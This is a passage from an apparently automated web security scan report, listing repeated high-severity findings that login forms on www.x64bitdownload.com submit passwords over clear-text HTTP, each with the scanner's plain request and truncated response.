  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-groups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22groups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.166. http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-highspeed-connection-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-highspeed-connection-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A20%3A%22highspeed-connection%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A20%3A%22highspeed+connection%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32070


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.167. http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-image-grabber-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-image-grabber-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A13%3A%22image-grabber%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A13%3A%22image+grabber%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91637


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.168. http://www.x64bitdownload.com/64-bit-images-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-images-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-images-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22images%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.169. http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-internet-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-internet-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39465


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.170. http://www.x64bitdownload.com/64-bit-internet-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-internet-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-internet-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22internet%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93902


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.171. http://www.x64bitdownload.com/64-bit-kill-file-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-kill-file-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-kill-file-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:56:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22kill-file%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22kill+file%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93504


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.172. http://www.x64bitdownload.com/64-bit-killfile-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-killfile-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-killfile-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:57:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:07:25 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28388


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.173. http://www.x64bitdownload.com/64-bit-mp3-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-mp3-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-mp3-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.174. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-multimedia-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-multimedia-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:19 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92538


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.175. http://www.x64bitdownload.com/64-bit-multipart-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-multipart-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-multipart-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:39 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73514


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.176. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-news-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:35 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42617


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.177. http://www.x64bitdownload.com/64-bit-news-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-news-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.178. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-reader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-news-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.179. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsfeed-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-newsfeed-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37199


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.180. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.181. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroup-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-newsgroup-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76091


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.182. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:59 GMT
Cache-Control: max-age=600
Pragma: cache
